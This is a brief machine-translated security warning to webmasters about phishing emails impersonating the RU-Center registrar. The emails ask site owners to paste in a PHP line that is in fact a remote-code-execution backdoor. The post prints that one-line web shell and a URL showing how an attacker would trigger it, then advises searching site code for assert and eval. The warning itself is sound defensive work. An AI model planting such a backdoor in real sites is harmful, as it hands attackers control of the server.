不懂PHP的“站长”请注意。漏洞。

这是一个自动翻译。
点击此处以原始语言阅读出版物。

今天我的一些朋友收到了一封信，据称是来自RU-Center（俄罗斯最大的域名注册商） nic.ru ，内容如下：

信件是从info@nic.technical发送的。在信中，代表RU-Center的攻击者建议在网站上放置以下代码：

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

不幸的是，我们的许多自称“网站管理员”（众多网站所有者）的同事并不了解 PHP，也不会考虑上述代码的危险性。如果将字符串作为参数传递给该函数，那么它会被 assert()视为 PHP 代码！小心点！

我建议您使用 assert 或 eval 命令检查您的 php 项目是否存在漏洞。如果项目代码中存在这些命令，请不要惊慌 - 研究它们的算法。授权使用算法是完全可能的。在上述示例的情况下，该命令将允许攻击者调用您的站点，例如，使用 RUCENTER 参数 - http://sistema-audit.ru/?RUCENTER=PHP-code

我们建议您使用例如 linux 命令 grep -i -r 'assert' /home / www / mysite /* 执行搜索，指示包含站点文件的文件夹，以获取可疑文件的列表实例是使用的代码。

照顾好您自己和您的网站！

这是一个自动翻译。
点击此处以原始语言阅读出版物。